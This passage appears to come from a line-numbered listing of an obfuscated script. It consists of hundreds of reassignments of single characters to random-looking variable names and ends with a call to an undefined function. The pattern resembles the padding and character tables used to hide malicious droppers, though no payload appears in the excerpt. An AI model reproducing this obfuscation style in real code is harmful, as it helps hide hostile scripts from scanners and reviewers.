781 | lsllbqf = "x"; | |
782 | lsllbqf = "P"; | |
783 | lsllbqf = "B"; | |
784 | lsllbqf = "N"; | |
785 | lsllbqf = "N"; | |
786 | lsllbqf = "b"; | |
787 | lsllbqf = "x"; | |
788 | lsllbqf = "C"; | |
789 | lsllbqf = "e"; | |
790 | lsllbqf = "x"; | |
791 | lsllbqf = "h"; | |
792 | lsllbqf = "w"; | |
793 | lsllbqf = "e"; | |
794 | lsllbqf = "w"; | |
795 | lsllbqf = "A"; | |
796 | lsllbqf = "x"; | |
797 | lsllbqf = "o"; | |
798 | lsllbqf = "C"; | |
799 | lsllbqf = "O"; | |
800 | lsllbqf = "d"; | |
801 | lsllbqf = "h"; | |
802 | lsllbqf = "j"; | |
803 | lsllbqf = "K"; | |
804 | lsllbqf = "e"; | |
805 | lsllbqf = "P"; | |
806 | lsllbqf = "d"; | |
807 | lsllbqf = "j"; | |
808 | lsllbqf = "U"; | |
809 | lsllbqf = "\\"; | |
810 | kreyd = "r"; | |
811 | kreyd = "Y"; | |
812 | kreyd = "N"; | |
813 | suynkw = "k"; | |
814 | suynkw = "s"; | |
815 | suynkw = "W"; | |
816 | suynkw = "n"; | |
817 | suynkw = "n"; | |
818 | suynkw = "s"; | |
819 | suynkw = "O"; | |
820 | suynkw = "j"; | |
821 | suynkw = "X"; | |
822 | suynkw = "x"; | |
823 | suynkw = "p"; | |
824 | suynkw = "N"; | |
825 | suynkw = "r"; | |
826 | suynkw = "r"; | |
827 | suynkw = "U"; | |
828 | suynkw = "Z"; | |
829 | suynkw = "L"; | |
830 | suynkw = "y"; | |
831 | suynkw = "i"; | |
832 | suynkw = "x"; | |
833 | suynkw = "Z"; | |
834 | suynkw = "B"; | |
835 | suynkw = "J"; | |
836 | suynkw = "L"; | |
837 | suynkw = "R"; | |
838 | suynkw = "d"; | |
839 | suynkw = "u"; | |
840 | suynkw = "p"; | |
841 | suynkw = "E"; | |
842 | suynkw = "C"; | |
843 | nkhbhdqtz = "h"; | |
844 | nkhbhdqtz = "U"; | |
845 | nkhbhdqtz = "A"; | |
846 | nkhbhdqtz = "Y"; | |
847 | nkhbhdqtz = "F"; | |
848 | nkhbhdqtz = "D"; | |
849 | nkhbhdqtz = "i"; | |
850 | nkhbhdqtz = "Y"; | |
851 | nkhbhdqtz = "z"; | |
852 | nkhbhdqtz = "K"; | |
853 | nkhbhdqtz = "s"; | |
854 | nkhbhdqtz = "v"; | |
855 | nkhbhdqtz = "o"; | |
856 | nkhbhdqtz = "N"; | |
857 | nkhbhdqtz = "q"; | |
858 | nkhbhdqtz = "c"; | |
859 | nkhbhdqtz = "q"; | |
860 | nkhbhdqtz = "G"; | |
861 | nkhbhdqtz = "t"; | |
862 | nkhbhdqtz = "Q"; | |
863 | nkhbhdqtz = "f"; | |
864 | nkhbhdqtz = "P"; | |
865 | nkhbhdqtz = "j"; | |
866 | nkhbhdqtz = "S"; | |
867 | nkhbhdqtz = "G"; | |
868 | nkhbhdqtz = "D"; | |
869 | nkhbhdqtz = "q"; | |
870 | nkhbhdqtz = "C"; | |
871 | nkhbhdqtz = "f"; | |
872 | nkhbhdqtz = "u"; | |
873 | nkhbhdqtz = "J"; | |
874 | nkhbhdqtz = "E"; | |
875 | stnkigbd = "a"; | |
876 | stnkigbd = "j"; | |
877 | stnkigbd = "h"; | |
878 | stnkigbd = "R"; | |
879 | stnkigbd = "t"; | |
880 | stnkigbd = "r"; | |
881 | stnkigbd = "b"; | |
882 | stnkigbd = "M"; | |
883 | stnkigbd = "M"; | |
884 | stnkigbd = "K"; | |
885 | vbmkv = "e"; | |
886 | vbmkv = "U"; | |
887 | vbmkv = "p"; | |
888 | vbmkv = "C"; | |
889 | vbmkv = "p"; | |
890 | vbmkv = "j"; | |
891 | vbmkv = "z"; | |
892 | vbmkv = "e"; | |
893 | vbmkv = "o"; | |
894 | vbmkv = "N"; | |
895 | vbmkv = "l"; | |
896 | vbmkv = "h"; | |
897 | vbmkv = "G"; | |
898 | vbmkv = "U"; | |
899 | vbmkv = "O"; | |
900 | vbmkv = "k"; | |
901 | vbmkv = "M"; | |
902 | vbmkv = "k"; | |
903 | vbmkv = "s"; | |
904 | vbmkv = "O"; | |
905 | vbmkv = "Z"; | |
906 | vbmkv = "L"; | |
907 | vbmkv = "K"; | |
908 | vbmkv = "p"; | |
909 | vbmkv = "e"; | |
910 | vbmkv = "c"; | |
911 | vbmkv = "H"; | |
912 | vbmkv = "o"; | |
913 | vbmkv = "k"; | |
914 | vbmkv = "n"; | |
915 | vbmkv = "v"; | |
916 | vbmkv = "l"; | |
917 | vbmkv = "O"; | |
918 | vbmkv = "L"; | |
919 | vbmkv = "S"; | |
920 | vbmkv = "e"; | |
921 | vbmkv = "M"; | |
922 | vbmkv = "s"; | |
923 | vbmkv = "F"; | |
924 | vbmkv = "I"; | |
925 | vbmkv = "Q"; | |
926 | vbmkv = "s"; | |
927 | vbmkv = "L"; | |
928 | vbmkv = "L"; | |
929 | zwzxtoky = "u"; | |
930 | zwzxtoky = "r"; | |
931 | zwzxtoky = "Z"; | |
932 | zwzxtoky = "C"; | |
933 | zwzxtoky = "X"; | |
934 | zwzxtoky = "x"; | |
935 | zwzxtoky = "g"; | |
936 | zwzxtoky = "r"; | |
937 | zwzxtoky = "u"; | |
938 | zwzxtoky = "A"; | |
939 | zwzxtoky = "k"; | |
940 | zwzxtoky = "T"; | |
941 | zwzxtoky = "c"; | |
942 | zwzxtoky = "T"; | |
943 | zwzxtoky = "X"; | |
944 | zwzxtoky = "v"; | |
945 | zwzxtoky = "q"; | |
946 | zwzxtoky = "e"; | |
947 | zwzxtoky = "w"; | |
948 | zwzxtoky = "f"; | |
949 | zwzxtoky = "a"; | |
950 | zwzxtoky = "p"; | |
951 | zwzxtoky = "U"; | |
952 | zwzxtoky = "Q"; | |
953 | zwzxtoky = "x"; | |
954 | zwzxtoky = "T"; | |
955 | zwzxtoky = "H"; | |
956 | zwzxtoky = "L"; | |
957 | zwzxtoky = "e"; | |
958 | zwzxtoky = "z"; | |
959 | zwzxtoky = "A"; | |
960 | zwzxtoky = "I"; | |
961 | zwzxtoky = "r"; | |
962 | ngjlk = "h"; | |
963 | ngjlk = "F"; | |
964 | ngjlk = ":"; | |
965 | tgodpkavb = "r"; | |
966 | tgodpkavb = "D"; | |
967 | tgodpkavb = "E"; | |
968 | tgodpkavb = "u"; | |
969 | tgodpkavb = "m"; | |
970 | tgodpkavb = "P"; | |
971 | tgodpkavb = "m"; | |
972 | tgodpkavb = "a"; | |
973 | tgodpkavb = "U"; | |
974 | tgodpkavb = "B"; | |
975 | tgodpkavb = "S"; | |
976 | tgodpkavb = "K"; | |
977 | tgodpkavb = "j"; | |
978 | tgodpkavb = "J"; | |
979 | tgodpkavb = "w"; | |
980 | tgodpkavb = "C"; | |
981 | tgodpkavb = "L"; | |
982 | tgodpkavb = "J"; | |
983 | tgodpkavb = "D"; | |
984 | tgodpkavb = "E"; | |
985 | tgodpkavb = "e"; | |
986 | tgodpkavb = "v"; | |
987 | tgodpkavb = "b"; | |
988 | tgodpkavb = "o"; | |
989 | tgodpkavb = "h"; | |
990 | tgodpkavb = "H"; | |
991 | tgodpkavb = "C"; | |
992 | tgodpkavb = "Z"; | |
993 | tgodpkavb = "q"; | |
994 | tgodpkavb = "f"; | |
995 | tgodpkavb = "l"; | |
996 | tgodpkavb = "V"; | |
997 | tgodpkavb = "E"; | |
998 | tgodpkavb = "y"; | |
999 | tgodpkavb = "C"; | |
1000 | tgodpkavb = "l"; | |
1001 | tgodpkavb = "g"; | |
1002 | tgodpkavb = "o"; | |
1003 | tgodpkavb = "f"; | |
1004 | tgodpkavb = "o"; | |
1005 | tgodpkavb = "U"; | |
1006 | tgodpkavb = "i"; | |
1007 | csplmbzue = "q"; | |
1008 | csplmbzue = "R"; | |
1009 | csplmbzue = "g"; | |
1010 | csplmbzue = "L"; | |
1011 | csplmbzue = "R"; | |
1012 | csplmbzue = "H"; | |
1013 | csplmbzue = "w"; | |
1014 | csplmbzue = "w"; | |
1015 | csplmbzue = "o"; | |
1016 | csplmbzue = "L"; | |
1017 | csplmbzue = "Z"; | |
1018 | csplmbzue = "c"; | |
1019 | csplmbzue = "y"; | |
1020 | csplmbzue = "n"; | |
1021 | csplmbzue = "j"; | |
1022 | csplmbzue = "x"; | |
1023 | csplmbzue = "u"; | |
1024 | csplmbzue = "p"; | |
1025 | csplmbzue = "w"; | |
1026 | csplmbzue = "a"; | |
1027 | csplmbzue = "X"; | |
1028 | csplmbzue = "y"; | |
1029 | csplmbzue = "O"; | |
1030 | csplmbzue = "E"; | |
1031 | csplmbzue = "W"; | |
1032 | csplmbzue = "m"; | |
1033 | csplmbzue = "W"; | |
1034 | csplmbzue = "i"; | |
1035 | csplmbzue = "I"; | |
1036 | csplmbzue = "K"; | |
1037 | csplmbzue = "t"; | |
1038 | csplmbzue = "e"; | |
1039 | hnwmedkaj = "H"; | |
1040 | hnwmedkaj = "V"; | |
1041 | hnwmedkaj = "n"; | |
1042 | hnwmedkaj = "l"; | |
1043 | hnwmedkaj = "U"; | |
1044 | hnwmedkaj = "G"; | |
1045 | hnwmedkaj = "O"; | |
1046 | hnwmedkaj = "A"; | |
1047 | hnwmedkaj = "Y"; | |
1048 | hnwmedkaj = "k"; | |
1049 | nkdevnmzx = "m"; | |
1050 | nkdevnmzx = "L"; | |
1051 | nkdevnmzx = "E"; | |
1052 | nkdevnmzx = "S"; | |
1053 | nkdevnmzx = "f"; | |
1054 | nkdevnmzx = "E"; | |
1055 | nkdevnmzx = "B"; | |
1056 | nkdevnmzx = "b"; | |
1057 | nkdevnmzx = "A"; | |
1058 | nkdevnmzx = "M"; | |
1059 | nkdevnmzx = "M"; | |
1060 | nkdevnmzx = "s"; | |
1061 | nkdevnmzx = "x"; | |
1062 | nkdevnmzx = "S"; | |
1063 | nkdevnmzx = "e"; | |
1064 | nkdevnmzx = "L"; | |
1065 | nkdevnmzx = "H"; | |
1066 | nkdevnmzx = "r"; | |
1067 | nkdevnmzx = "T"; | |
1068 | nkdevnmzx = "y"; | |
1069 | nkdevnmzx = "u"; | |
1070 | nkdevnmzx = "m"; | |
1071 | nkdevnmzx = "Q"; | |
1072 | nkdevnmzx = "Q"; | |
1073 | nkdevnmzx = "S"; | |
1074 | nkdevnmzx = "a"; | |
1075 | nkdevnmzx = "E"; | |
1076 | nkdevnmzx = "I"; | |
1077 | nkdevnmzx = "O"; | |
1078 | nkdevnmzx = "b"; | |
1079 | nkdevnmzx = "M"; | |
1080 | nkdevnmzx = "D"; | |
1081 | nkdevnmzx = "Y"; | |
1082 | nkdevnmzx = "U"; | |
1083 | nkdevnmzx = "w"; | |
1084 | nkdevnmzx = "N"; | |
1085 | nkdevnmzx = "E"; | |
1086 | nkdevnmzx = "p"; | |
1087 | mbteaiel = "f"; | |
1088 | mbteaiel = "S"; | |
1089 | mbteaiel = "s"; | |
1090 | mbteaiel = "V"; | |
1091 | mbteaiel = "D"; | |
1092 | mbteaiel = "x"; | |
1093 | mbteaiel = "Y"; | |
1094 | mbteaiel = "z"; | |
1095 | mbteaiel = "e"; | |
1096 | mbteaiel = "O"; | |
1097 | mbteaiel = "c"; | |
1098 | mbteaiel = "b"; | |
1099 | mbteaiel = "l"; | |
1100 | mbteaiel = "x"; | |
1101 | mbteaiel = "X"; | |
1102 | mbteaiel = "P"; | |
1103 | mbteaiel = "S"; | |
1104 | mbteaiel = "o"; | |
1105 | mbteaiel = "D"; | |
1106 | mbteaiel = "G"; | |
1107 | mbteaiel = "c"; | |
1108 | mbteaiel = "q"; | |
1109 | mbteaiel = "S"; | |
1110 | mbteaiel = "o"; | |
1111 | mbteaiel = "T"; | |
1112 | mbteaiel = "Y"; | |
1113 | mbteaiel = "i"; | |
1114 | mbteaiel = "k"; | |
1115 | mbteaiel = "g"; | |
1116 | mbteaiel = "q"; | |
1117 | mbteaiel = "q"; | |
1118 | mbteaiel = "z"; | |
1119 | mbteaiel = "W"; | |
1120 | mbteaiel = "-"; | |
1121 | tqpdpkrxg = "G"; | |
1122 | tqpdpkrxg = "X"; | |
1123 | tqpdpkrxg = "n"; | |
1124 | tqpdpkrxg = "p"; | |
1125 | tqpdpkrxg = "F"; | |
1126 | tqpdpkrxg = "p"; | |
1127 | tqpdpkrxg = "y"; | |
1128 | tqpdpkrxg = "K"; | |
1129 | tqpdpkrxg = "v"; | |
1130 | tqpdpkrxg = "n"; | |
1131 | tqpdpkrxg = "A"; | |
1132 | tqpdpkrxg = "y"; | |
1133 | tqpdpkrxg = "b"; | |
1134 | tqpdpkrxg = "w"; | |
1135 | tqpdpkrxg = "U"; | |
1136 | tqpdpkrxg = "E"; | |
1137 | tqpdpkrxg = "P"; | |
1138 | tqpdpkrxg = "i"; | |
1139 | tqpdpkrxg = "j"; | |
1140 | tqpdpkrxg = "m"; | |
1141 | tqpdpkrxg = "R"; | |
1142 | tqpdpkrxg = "e"; | |
1143 | tqpdpkrxg = "Z"; | |
1144 | tqpdpkrxg = "S"; | |
1145 | tqpdpkrxg = "P"; | |
1146 | tqpdpkrxg = "e"; | |
1147 | tqpdpkrxg = "X"; | |
1148 | tqpdpkrxg = "O"; | |
1149 | tqpdpkrxg = "W"; | |
1150 | tqpdpkrxg = "x"; | |
1151 | tqpdpkrxg = "n"; | |
1152 | tqpdpkrxg = "y"; | |
1153 | tqpdpkrxg = "L"; | |
1154 | tqpdpkrxg = "M"; | |
1155 | tqpdpkrxg = "M"; | |
1156 | tqpdpkrxg = "b"; | |
1157 | tqpdpkrxg = "b"; | |
1158 | tqpdpkrxg = "v"; | |
1159 | tqpdpkrxg = "."; | |
1160 | yjqzmhik = "x"; | |
1161 | yjqzmhik = "G"; | |
1162 | yjqzmhik = "u"; | |
1163 | yjqzmhik = "N"; | |
1164 | yjqzmhik = "F"; | |
1165 | yjqzmhik = "R"; | |
1166 | yjqzmhik = "T"; | |
1167 | yjqzmhik = "t"; | |
1168 | yjqzmhik = "K"; | |
1169 | yjqzmhik = "F"; | |
1170 | yjqzmhik = "q"; | |
1171 | yjqzmhik = "I"; | |
1172 | yjqzmhik = "D"; | |
1173 | yjqzmhik = "R"; | |
1174 | yjqzmhik = "Z"; | |
1175 | yjqzmhik = "A"; | |
1176 | yjqzmhik = "d"; | |
1177 | yjqzmhik = "f"; | |
1178 | yjqzmhik = "f"; | |
1179 | yjqzmhik = "T"; | |
1180 | yjqzmhik = "S"; | |
1181 | yjqzmhik = "E"; | |
1182 | yjqzmhik = "s"; | |
1183 | yjqzmhik = "M"; | |
1184 | yjqzmhik = "m"; | |
1185 | yjqzmhik = "I"; | |
1186 | yjqzmhik = "Y"; | |
1187 | yjqzmhik = "b"; | |
1188 | yjqzmhik = "B"; | |
1189 | yjqzmhik = "d"; | |
1190 | yjqzmhik = "%"; | |
1191 | otdebqcfm = "S"; | |
1192 | otdebqcfm = "S"; | |
1193 | otdebqcfm = "b"; | |
1194 | otdebqcfm = "T"; | |
1195 | otdebqcfm = "Q"; | |
1196 | otdebqcfm = "l"; | |
1197 | otdebqcfm = "m"; | |
1198 | otdebqcfm = "j"; | |
1199 | otdebqcfm = "K"; | |
1200 | otdebqcfm = "a"; | |
1201 | otdebqcfm = "D"; | |
1202 | otdebqcfm = "V"; | |
1203 | otdebqcfm = "T"; | |
1204 | otdebqcfm = "a"; | |
1205 | otdebqcfm = "E"; | |
1206 | otdebqcfm = "V"; | |
1207 | otdebqcfm = "c"; | |
1208 | otdebqcfm = "U"; | |
1209 | otdebqcfm = "p"; | |
1210 | otdebqcfm = "g"; | |
1211 | otdebqcfm = "k"; | |
1212 | otdebqcfm = "w"; | |
1213 | otdebqcfm = "O"; | |
1214 | otdebqcfm = "v"; | |
1215 | otdebqcfm = "_"; | |
1216 | vfqkxqvwu = "U"; | |
1217 | vfqkxqvwu = "A"; | |
1218 | vfqkxqvwu = "E"; | |
1219 | vfqkxqvwu = "u"; | |
1220 | vfqkxqvwu = "w"; | |
1221 | vfqkxqvwu = "U"; | |
1222 | vfqkxqvwu = "a"; | |
1223 | vfqkxqvwu = "V"; | |
1224 | vfqkxqvwu = "J"; | |
1225 | vfqkxqvwu = "G"; | |
1226 | vfqkxqvwu = "H"; | |
1227 | vfqkxqvwu = "M"; | |
1228 | vfqkxqvwu = "V"; | |
1229 | vfqkxqvwu = "r"; | |
1230 | vfqkxqvwu = "r"; | |
1231 | vfqkxqvwu = "a"; | |
1232 | vfqkxqvwu = "N"; | |
1233 | vfqkxqvwu = "B"; | |
1234 | vfqkxqvwu = "X"; | |
1235 | vfqkxqvwu = "X"; | |
1236 | vfqkxqvwu = "o"; | |
1237 | vfqkxqvwu = "y"; | |
1238 | vfqkxqvwu = "I"; | |
1239 | vfqkxqvwu = "Y"; | |
1240 | vfqkxqvwu = "L"; | |
1241 | vfqkxqvwu = "g"; | |
1242 | qgllcy = "h"; | |
1243 | qgllcy = "I"; | |
1244 | zgosbt = "m"; | |
1245 | zgosbt = "e"; | |
1246 | zgosbt = "h"; | |
1247 | zgosbt = "R"; | |
1248 | zgosbt = "I"; | |
1249 | zgosbt = "v"; | |
1250 | zgosbt = "S"; | |
1251 | zgosbt = "j"; | |
1252 | zgosbt = "r"; | |
1253 | zgosbt = "C"; | |
1254 | zgosbt = "v"; | |
1255 | zgosbt = "j"; | |
1256 | zgosbt = "g"; | |
1257 | zgosbt = "u"; | |
1258 | zgosbt = "O"; | |
1259 | zgosbt = "M"; | |
1260 | zgosbt = "H"; | |
1261 | zgosbt = "L"; | |
1262 | zgosbt = "g"; | |
1263 | zgosbt = "W"; | |
1264 | zgosbt = "f"; | |
1265 | zgosbt = "A"; | |
1266 | zgosbt = "w"; | |
1267 | zgosbt = "R"; | |
1268 | zgosbt = "R"; | |
1269 | zgosbt = "b"; | |
1270 | zgosbt = "o"; | |
1271 | zgosbt = "s"; | |
1272 | zgosbt = "G"; | |
1273 | zgosbt = "m"; | |
1274 | zgosbt = "a"; | |
1275 | zgosbt = "f"; | |
1276 | zgosbt = "4"; | |
1277 | xrqkkd = "w"; | |
1278 | xrqkkd = "K"; | |
1279 | xrqkkd = "Z"; | |
1280 | xrqkkd = "C"; | |
1281 | xrqkkd = "B"; | |
1282 | xrqkkd = "m"; | |
1283 | xrqkkd = "T"; | |
1284 | xrqkkd = "q"; | |
1285 | xrqkkd = "x"; | |
1286 | xrqkkd = "M"; | |
1287 | xrqkkd = "K"; | |
1288 | xrqkkd = "q"; | |
1289 | xrqkkd = "F"; | |
1290 | xrqkkd = "@"; | |
1291 | xainqrjq = "J"; | |
1292 | xainqrjq = "e"; | |
1293 | xainqrjq = "B"; | |
1294 | xainqrjq = "i"; | |
1295 | xainqrjq = "o"; | |
1296 | xainqrjq = "T"; | |
1297 | xainqrjq = "X"; | |
1298 | xainqrjq = "Z"; | |
1299 | xainqrjq = "I"; | |
1300 | xainqrjq = "Y"; | |
1301 | xainqrjq = "N"; | |
1302 | xainqrjq = "&"; | |
1303 | vewcgk = "M"; | |
1304 | vewcgk = "i"; | |
1305 | vewcgk = "I"; | |
1306 | vewcgk = "d"; | |
1307 | vewcgk = "W"; | |
1308 | vewcgk = "k"; | |
1309 | vewcgk = "F"; | |
1310 | vewcgk = "P"; | |
1311 | vewcgk = "o"; | |
1312 | vewcgk = "J"; | |
1313 | vewcgk = "k"; | |
1314 | vewcgk = "w"; | |
1315 | vewcgk = "M"; | |
1316 | vewcgk = "a"; | |
1317 | vewcgk = "J"; | |
1318 | vewcgk = "e"; | |
1319 | vewcgk = "k"; | |
1320 | vewcgk = "U"; | |
1321 | vewcgk = "D"; | |
1322 | vewcgk = "g"; | |
1323 | vewcgk = "j"; | |
1324 | vewcgk = "X"; | |
1325 | vewcgk = "d"; | |
1326 | vewcgk = "R"; | |
1327 | vewcgk = "g"; | |
1328 | vewcgk = "F"; | |
1329 | vewcgk = "a"; | |
1330 | vewcgk = "G"; | |
1331 | vewcgk = "/"; | |
1332 | dcosqo = "X"; | |
1333 | dcosqo = "Y"; | |
1334 | dcosqo = "a"; | |
1335 | dcosqo = "S"; | |
1336 | dcosqo = "x"; | |
1337 | dcosqo = "r"; | |
1338 | dcosqo = "u"; | |
1339 | dcosqo = "o"; | |
1340 | dcosqo = "z"; | |
1341 | dcosqo = "C"; | |
1342 | dcosqo = "D"; | |
1343 | dcosqo = "g"; | |
1344 | dcosqo = "G"; | |
1345 | dcosqo = "e"; | |
1346 | dcosqo = "q"; | |
1347 | dcosqo = "I"; | |
1348 | dcosqo = "e"; | |
1349 | dcosqo = "G"; | |
1350 | dcosqo = "L"; | |
1351 | dcosqo = "I"; | |
1352 | dcosqo = "a"; | |
1353 | pchrmhktt = "X"; | |
1354 | pchrmhktt = "S"; | |
1355 | pchrmhktt = "z"; | |
1356 | pchrmhktt = "E"; | |
1357 | pchrmhktt = "k"; | |
1358 | pchrmhktt = "z"; | |
1359 | pchrmhktt = "Z"; | |
1360 | pchrmhktt = "R"; | |
1361 | pchrmhktt = "z"; | |
1362 | pchrmhktt = "p"; | |
1363 | pchrmhktt = "r"; | |
1364 | pchrmhktt = "g"; | |
1365 | pchrmhktt = "d"; | |
1366 | pchrmhktt = "G"; | |
1367 | pchrmhktt = "L"; | |
1368 | pchrmhktt = "V"; | |
1369 | pchrmhktt = "B"; | |
1370 | pchrmhktt = "R"; | |
1371 | pchrmhktt = "H"; | |
1372 | jwpdfp = "F"; | |
1373 | jwpdfp = "w"; | |
1374 | jwpdfp = "x"; | |
1375 | jwpdfp = "g"; | |
1376 | jwpdfp = "S"; | |
1377 | jwpdfp = "o"; | |
1378 | jwpdfp = "Z"; | |
1379 | jwpdfp = "P"; | |
1380 | jwpdfp = "M"; | |
1381 | jwpdfp = "h"; | |
1382 | jwpdfp = "U"; | |
1383 | jwpdfp = "s"; | |
1384 | jwpdfp = "d"; | |
1385 | jwpdfp = "e"; | |
1386 | jwpdfp = "t"; | |
1387 | jwpdfp = "r"; | |
1388 | jwpdfp = "D"; | |
1389 | jwpdfp = "f"; | |
1390 | jwpdfp = "H"; | |
1391 | jwpdfp = "P"; | |
1392 | jwpdfp = "M"; | |
1393 | jwpdfp = "t"; | |
1394 | jwpdfp = "b"; | |
1395 | fwcopck = "S"; | |
1396 | fwcopck = "w"; | |
1397 | fwcopck = "U"; | |
1398 | fwcopck = "r"; | |
1399 | fwcopck = "X"; | |
1400 | fwcopck = "u"; | |
1401 | fwcopck = "t"; | |
1402 | fwcopck = "b"; | |
1403 | fwcopck = "E"; | |
1404 | fwcopck = "F"; | |
1405 | fwcopck = "W"; | |
1406 | fwcopck = "f"; | |
1407 | pxptif = "Z"; | |
1408 | pxptif = "a"; | |
1409 | pxptif = "v"; | |
1410 | pxptif = "G"; | |
1411 | pxptif = "m"; | |
1412 | pxptif = "z"; | |
1413 | pxptif = "G"; | |
1414 | pxptif = "b"; | |
1415 | pxptif = "Y"; | |
1416 | pxptif = "w"; | |
1417 | pxptif = "n"; | |
1418 | pxptif = "m"; | |
1419 | pxptif = "U"; | |
1420 | pxptif = "O"; | |
1421 | pxptif = "X"; | |
1422 | pxptif = "h"; | |
1423 | pxptif = "U"; | |
1424 | pxptif = "p"; | |
1425 | pxptif = "y"; | |
1426 | pxptif = "L"; | |
1427 | pxptif = "V"; | |
1428 | pxptif = "T"; | |
1429 | pxptif = "a"; | |
1430 | pxptif = "W"; | |
1431 | pxptif = "d"; | |
1432 | pxptif = "S"; | |
1433 | pxptif = "p"; | |
1434 | pxptif = "m"; | |
1435 | pxptif = "f"; | |
1436 | pxptif = "q"; | |
1437 | pxptif = "D"; | |
1438 | pxptif = "y"; | |
1439 | pxptif = "7"; | |
1440 | ipnopgrfn = "T"; | |
1441 | ipnopgrfn = "J"; | |
1442 | ipnopgrfn = "P"; | |
1443 | ipnopgrfn = "f"; | |
1444 | ipnopgrfn = "h"; | |
1445 | ipnopgrfn = "G"; | |
1446 | ipnopgrfn = "G"; | |
1447 | ipnopgrfn = "O"; | |
1448 | ipnopgrfn = "y"; | |
1449 | ipnopgrfn = "G"; | |
1450 | ipnopgrfn = "x"; | |
1451 | ipnopgrfn = "i"; | |
1452 | ipnopgrfn = "B"; | |
1453 | ipnopgrfn = "R"; | |
1454 | ipnopgrfn = "l"; | |
1455 | ipnopgrfn = "F"; | |
1456 | ipnopgrfn = "S"; | |
1457 | ipnopgrfn = "v"; | |
1458 | ipnopgrfn = "u"; | |
1459 | ipnopgrfn = "G"; | |
1460 | ipnopgrfn = "h"; | |
1461 | ipnopgrfn = "Q"; | |
1462 | ipnopgrfn = "n"; | |
1463 | ipnopgrfn = "L"; | |
1464 | ipnopgrfn = "f"; | |
1465 | ipnopgrfn = "x"; | |
1466 | ipnopgrfn = "h"; | |
1467 | ipnopgrfn = "w"; | |
1468 | ipnopgrfn = "R"; | |
1469 | ipnopgrfn = "s"; | |
1470 | ipnopgrfn = "Y"; | |
1471 | ipnopgrfn = "I"; | |
1472 | ipnopgrfn = "\""; | |
1473 | zeeasphn = "H"; | |
1474 | zeeasphn = "J"; | |
1475 | zeeasphn = "m"; | |
1476 | zeeasphn = "e"; | |
1477 | zeeasphn = "x"; | |
1478 | zeeasphn = "x"; | |
1479 | zeeasphn = "q"; | |
1480 | zeeasphn = "H"; | |
1481 | zeeasphn = "C"; | |
1482 | zeeasphn = "p"; | |
1483 | zeeasphn = "h"; | |
1484 | zeeasphn = "j"; | |
1485 | zeeasphn = "v"; | |
1486 | jtzfygyyy = "o"; | |
1487 | jtzfygyyy = "n"; | |
1488 | jtzfygyyy = "p"; | |
1489 | jtzfygyyy = "G"; | |
1490 | jtzfygyyy = "f"; | |
1491 | jtzfygyyy = "S"; | |
1492 | jtzfygyyy = "B"; | |
1493 | jtzfygyyy = "I"; | |
1494 | jtzfygyyy = "P"; | |
1495 | jtzfygyyy = "D"; | |
1496 | jtzfygyyy = "r"; | |
1497 | jtzfygyyy = "r"; | |
1498 | jtzfygyyy = "F"; | |
1499 | jtzfygyyy = "y"; | |
1500 | jtzfygyyy = "c"; | |
1501 | jtzfygyyy = "g"; | |
1502 | jtzfygyyy = "M"; | |
1503 | jtzfygyyy = "a"; | |
1504 | jtzfygyyy = "l"; | |
1505 | jtzfygyyy = "V"; | |
1506 | jtzfygyyy = "P"; | |
1507 | jtzfygyyy = "X"; | |
1508 | jtzfygyyy = "V"; | |
1509 | jtzfygyyy = "W"; | |
1510 | jtzfygyyy = "R"; | |
1511 | jtzfygyyy = "W"; | |
1512 | jtzfygyyy = "S"; | |
1513 | jtzfygyyy = "W"; | |
1514 | jtzfygyyy = "y"; | |
1515 | jtzfygyyy = "m"; | |
1516 | jtzfygyyy = "s"; | |
1517 | jtzfygyyy = "d"; | |
1518 | jtzfygyyy = "I"; | |
1519 | jtzfygyyy = "d"; | |
1520 | jtzfygyyy = "q"; | |
1521 | jtzfygyyy = "u"; | |
1522 | jtzfygyyy = "K"; | |
1523 | jtzfygyyy = "Q"; | |
1524 | jtzfygyyy = "y"; | |
1525 | jtzfygyyy = "R"; | |
1526 | pjrxporr = "S"; | |
1527 | pjrxporr = "c"; | |
1528 | pjrxporr = "Y"; | |
1529 | pjrxporr = "p"; | |
1530 | pjrxporr = "g"; | |
1531 | pjrxporr = "a"; | |
1532 | pjrxporr = "m"; | |
1533 | pjrxporr = "v"; | |
1534 | pjrxporr = "V"; | |
1535 | pjrxporr = "f"; | |
1536 | pjrxporr = "P"; | |
1537 | pjrxporr = "c"; | |
1538 | pjrxporr = "z"; | |
1539 | pjrxporr = "s"; | |
1540 | pjrxporr = "d"; | |
1541 | pjrxporr = "A"; | |
1542 | pjrxporr = "m"; | |
1543 | pjrxporr = "i"; | |
1544 | pjrxporr = "S"; | |
1545 | pjrxporr = "z"; | |
1546 | pjrxporr = "E"; | |
1547 | pjrxporr = "T"; | |
1548 | pjrxporr = "H"; | |
1549 | pjrxporr = "Y"; | |
1550 | pjrxporr = "n"; | |
1551 | pjrxporr = "L"; | |
1552 | pjrxporr = "T"; | |
1553 | pjrxporr = "Y"; | |
1554 | pjrxporr = "R"; | |
1555 | pjrxporr = "l"; | |
1556 | pjrxporr = "j"; | |
1557 | pjrxporr = "b"; | |
1558 | pjrxporr = "h"; | |
1559 | pjrxporr = "W"; | |
1560 | pjrxporr = "F"; | |
1561 | pjrxporr = "F"; | |
1562 | pjrxporr = "L"; | |
1563 | pjrxporr = "C"; | |
1564 | pjrxporr = "E"; | |
1565 | pjrxporr = "U"; | |
1566 | pjrxporr = "J"; | |
1567 | pjrxporr = "5"; | |
1568 | owasznzh = "x"; | |
1569 | owasznzh = "H"; | |
1570 | owasznzh = "Q"; | |
1571 | owasznzh = "X"; | |
1572 | owasznzh = "K"; | |
1573 | owasznzh = "u"; | |
1574 | owasznzh = "z"; | |
1575 | owasznzh = "X"; | |
1576 | owasznzh = "N"; | |
1577 | owasznzh = "g"; | |
1578 | owasznzh = "h"; | |
1579 | owasznzh = "f"; | |
1580 | owasznzh = "H"; | |
1581 | owasznzh = "d"; | |
1582 | owasznzh = "N"; | |
1583 | owasznzh = "m"; | |
1584 | owasznzh = "z"; | |
1585 | owasznzh = "p"; | |
1586 | owasznzh = "B"; | |
1587 | owasznzh = "r"; | |
1588 | owasznzh = "w"; | |
1589 | owasznzh = "t"; | |
1590 | owasznzh = "l"; | |
1591 | owasznzh = "O"; | |
1592 | owasznzh = "c"; | |
1593 | owasznzh = "i"; | |
1594 | owasznzh = "d"; | |
1595 | owasznzh = "E"; | |
1596 | owasznzh = "S"; | |
1597 | owasznzh = "N"; | |
1598 | owasznzh = "m"; | |
1599 | owasznzh = "9"; | |
1600 | mvjzrp ( ); |
|